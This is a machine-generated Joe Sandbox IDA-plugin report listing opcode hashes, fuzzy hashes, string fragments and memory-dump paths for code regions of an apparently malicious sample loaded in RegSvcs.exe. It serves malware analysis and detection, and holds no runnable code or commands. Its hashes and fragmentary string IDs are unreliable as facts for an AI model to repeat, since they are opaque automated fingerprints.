                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LMB$pv
                                                                                                • API String ID: 0-122907696
                                                                                                • Opcode ID: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                                                                • Instruction ID: 3eeefadaa77a5fd53610c3ddf5e6e08206d1469657b97126345bc7f1514b4473
                                                                                                • Opcode Fuzzy Hash: 600361d03a19618f7b8b94130096601f70c9cb3cba6cb4618556b265baeca412
                                                                                                • Instruction Fuzzy Hash: 17E134B15183008BD3249F29C8623ABB7F1EFD2314F19892DD5C68B3A5E7799846C786
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NP,?$mij
                                                                                                • API String ID: 0-1436015776
                                                                                                • Opcode ID: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
                                                                                                • Instruction ID: d401854fd2cc12c548c1ecfb90c4d04a7bab5840ee8d20629697b9478a788be7
                                                                                                • Opcode Fuzzy Hash: b0905b15df5a93d70dff43b587df237d303d7f495d29f252faf92cbeebdeaadb
                                                                                                • Instruction Fuzzy Hash: BAA159756043109BD314DF25C8C162BB7A1EBC9728F24662EE9A5373D1D338EC018BDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M"O$fI.K
                                                                                                • API String ID: 0-3473069917
                                                                                                • Opcode ID: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                                                                • Instruction ID: 329e37de618e8a484b718af78b4319e64e69ed5ee2b204ae71a9d2e2a7026588
                                                                                                • Opcode Fuzzy Hash: 80b5e25900e62fa5b7f868b9038989c12ce663ab15b6782b2becc0f24b60a991
                                                                                                • Instruction Fuzzy Hash: 6431F275204691CBE7058F2AD450332FBE2EFA2310F69959DC0C69B392C679A8038B98
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M"O$fI.K
                                                                                                • API String ID: 0-3473069917
                                                                                                • Opcode ID: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                                                                • Instruction ID: f6fd3104235a574d950e3c7a6e1b37e2e28bb9fd8ddddb0b7385076b5cae7f54
                                                                                                • Opcode Fuzzy Hash: a50f177498f9f56b16f7faf9ec1f3eef4274cbe2d8e1a906e5367dc70dca7c59
                                                                                                • Instruction Fuzzy Hash: 9531E4752047418BE705CF2AD850723FBE2EFA6310F69959DC0C59F392CA79A843CB88
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @uB
                                                                                                • API String ID: 0-1161951709
                                                                                                • Opcode ID: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
                                                                                                • Instruction ID: 3f551a4cb18cdb69ea81a70624d177d743b65059aaf82db93a0913f8d0b3051b
                                                                                                • Opcode Fuzzy Hash: f8a3ba9d7d15869a0590316285b3361bbc22125b0af2a42800cc0a1cbe75883f
                                                                                                • Instruction Fuzzy Hash: BBA10FB560C300CFD714DF29E84162BB7E5FB86314F98482EF585A3251EB78E902CB5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %=>?
                                                                                                • API String ID: 0-1840824467
                                                                                                • Opcode ID: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                                                                • Instruction ID: 2abc8e8e60c77c2f0b16dca8ff0b337e7e89a8bc06769c8938415a8ee5640db8
                                                                                                • Opcode Fuzzy Hash: e07febe003d47278271e69a6a0aefd5b767d6bdb8c9269540a4227fbb6a47e9b
                                                                                                • Instruction Fuzzy Hash: 3291F832F046664BC7108E2DCA8025BB7E1ABC5754F698A3EE8D4E73D5EA3CCC454789
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 79.'
                                                                                                • API String ID: 0-3373235548
                                                                                                • Opcode ID: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                                                                • Instruction ID: 405c93bd9d9a1b956de89b764b78e8638e9be0a0d1f875f63fdafa76fe9ef724
                                                                                                • Opcode Fuzzy Hash: 3052bdd5b9f525bfd9188c849dd4df91fdd9a95299ae7d6644acfbbe7ea22ffb
                                                                                                • Instruction Fuzzy Hash: 4841E7745043A08BE7274B2A98A0733BFE1BF13305F68598DD0D21B792C26AA407CB55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "jB
                                                                                                • API String ID: 0-3276335117
                                                                                                • Opcode ID: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                                                                • Instruction ID: 5e1d8c0b1515ecfa31faa1c568337e693052fbc6b42adfdfb911d364570a270e
                                                                                                • Opcode Fuzzy Hash: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                                                                • Instruction Fuzzy Hash: D3C08CB6C080028FC5002F00AC0201AB9316B0320CF082039E40931133FA32F625950F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
                                                                                                • Instruction ID: 4df813ee5f95e841ab821c98b8b5526f3f5ae33236fdb9f70e9fd3558806e740
                                                                                                • Opcode Fuzzy Hash: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
                                                                                                • Instruction Fuzzy Hash: FA22A371A087119BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B811CB87
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
                                                                                                • Instruction ID: 4fc516d3c2b442602e552858b68be7734632adc4e96252525e150f64ed3c5c82
                                                                                                • Opcode Fuzzy Hash: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
                                                                                                • Instruction Fuzzy Hash: A3C12DB6E016258FCB18CF68D89166EB7F1FF89310F59456DD816AB391DB34AC01CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 43780e1e2e3a758066292245f2d39f1e33420cfffaa8785e26d50e06e5c09363
                                                                                                • Instruction ID: ecd98b3e30f16e247b6e37ac7b6d2412abfb1e49c209f28e4dabdc3486cf8122
                                                                                                • Opcode Fuzzy Hash: 43780e1e2e3a758066292245f2d39f1e33420cfffaa8785e26d50e06e5c09363
                                                                                                • Instruction Fuzzy Hash: BCA11934204A01CFD7158F29D850AF6B7A2FF87310F5945AAD1968B3E2D738A852CB99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
                                                                                                • Instruction ID: 9e2cb37ed21e11fbad960dddf737aaa980f21f536591a4909efc8a2909d6cdd4
                                                                                                • Opcode Fuzzy Hash: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
                                                                                                • Instruction Fuzzy Hash: 8B816BB2A093208BC718DF24D85026BBBF2EFD1314F59CA2DE4C59B394E7789905C786
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 153fd498e0abb89b475a44109399731ffe09bfd7c5c5609ef9d685e9fddd8eb3
                                                                                                • Instruction ID: 16ab1bb8e5813cbead69206b7097d26a452845dfa9c2a9323bffdb95a06fe9c3
                                                                                                • Opcode Fuzzy Hash: 153fd498e0abb89b475a44109399731ffe09bfd7c5c5609ef9d685e9fddd8eb3
                                                                                                • Instruction Fuzzy Hash: 3B81C0342042028BE724DF19C980A2BB3F1FF99314F55866DF9949B3A1EB75DC52CB4A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
                                                                                                • Instruction ID: 50f91a7135ac995fafd84abb40a2ff73bb47e1f903fd8f1524f89d133c35058d
                                                                                                • Opcode Fuzzy Hash: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
                                                                                                • Instruction Fuzzy Hash: B461B974A083918FC7258F38C88096F7BE1AF96310F0882BEE8D44B392D679DC45C796
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
                                                                                                • Instruction ID: 54b1615ece0800edf578a66f6fa2aba7240dcbf02494f9453b14f9bc813aead1
                                                                                                • Opcode Fuzzy Hash: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
                                                                                                • Instruction Fuzzy Hash: 39411732B0C2654BC7149E2D8D5427ABBD29FC5218F0DC57EA8C9DB7C7E57898009785
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
                                                                                                • Instruction ID: 3e828dc637c6aee99513c29835b99d357d4520004c741a88f318c34ece8bb8a3
                                                                                                • Opcode Fuzzy Hash: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
                                                                                                • Instruction Fuzzy Hash: E941E071E043258BDB10DF49D8922ABB372FF66314F19411ADC84AB354E739AD01CBA9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
                                                                                                • Instruction ID: f2730a4bd8400e6ccca1806e7c2ae68197e714b3aafd468424d48539a12bf7a5
                                                                                                • Opcode Fuzzy Hash: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
                                                                                                • Instruction Fuzzy Hash: 963179221487538BDB148928C9911B7FB51EFB2360F18473FC492177C1EB38A929D3E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
                                                                                                • Instruction ID: f14b1e3348f7832c914038d0d787e57ee05bed21178a428e04cc6a3a25562b9c
                                                                                                • Opcode Fuzzy Hash: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
                                                                                                • Instruction Fuzzy Hash: 5A311474610601CFD719CF2AC990A3377A2FB8A310B248E69D5566BBE5D774EC21CB88
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
                                                                                                • Instruction ID: 57171615dec06f4b3ea34e7e1adccaef3f23bda716e905d6b8a786efa676c01b
                                                                                                • Opcode Fuzzy Hash: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
                                                                                                • Instruction Fuzzy Hash: 8E318478B00502DFD318CF69DC40A327367FB86315B65863AE512A73E4DB74EC268A9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
                                                                                                • Instruction ID: f4efb102148d56746155fcf0a69e0a073b2616fb0f7bc1048f615d5ae5911f58
                                                                                                • Opcode Fuzzy Hash: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
                                                                                                • Instruction Fuzzy Hash: 7C2148719092108BE318CF1AC85576BFBA1EBC9328F19A52EE895573C0D37DDC418795
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
                                                                                                • Instruction ID: 3802dad517a1dce3a34934a6d2a34ff46c5f85f7b1ffb06216fa93cce7cae3e8
                                                                                                • Opcode Fuzzy Hash: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
                                                                                                • Instruction Fuzzy Hash: 53210774610B01CFD325CF29C84096677B2FF82314B19856DD0961BB76E734EC52CB88
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                • Instruction ID: 64260c404912ea7eadd8c0e068931427c058d1959da23024316477ca1ba720c8
                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                • Instruction Fuzzy Hash: 83112933A052D10EC3128D3C8410565FFA30EA7234F29939EF4B49B2D2DA269D8B8359
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
                                                                                                • Instruction ID: 9ac58ec8d4b3439cda35f7244ec872c65e6fe70fd35cd3954e032617cd07918a
                                                                                                • Opcode Fuzzy Hash: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
                                                                                                • Instruction Fuzzy Hash: CD015EF1B017124BD620AE55E4C1727A3A8AB9070CF58453EE9049B343EB79FC1586DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
                                                                                                • Instruction ID: 8b14ff6e9f909d0a458ac4e63c91713bd7563fb29c01f731cd10e6b3bc0629ea
                                                                                                • Opcode Fuzzy Hash: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
                                                                                                • Instruction Fuzzy Hash: EDF0F935500208BBD2204B079C41D37736EFB9E768F101329F525232E1E362ED2187E9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                • Instruction ID: 678eaee0e22883ac7a801a5a92a95a4c58884562fe07dcc7c3908c64aa7d63e3
                                                                                                • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                                                • Instruction Fuzzy Hash: 5AD0A7B1948BB10E57588D3804E04B7FBE8EA47613B18159FE4D2E7205D224DC41469C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                                                                • Instruction ID: 776a1f7dd0c074e79f55533e911544892ec85f46c384d1e8a4e462c15b4e92e9
                                                                                                • Opcode Fuzzy Hash: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                                                                • Instruction Fuzzy Hash: 97D022B86481003B0248CB09CC4AE33B77CC387200F002034BE05C3350C610EC2182EE
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1826198367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_RegSvcs.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: 0=$0=$ER$P&
                                                                                                • API String ID: 237503144-76498936
                                                                                                • Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                • Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
                                                                                                • Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                                                • Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84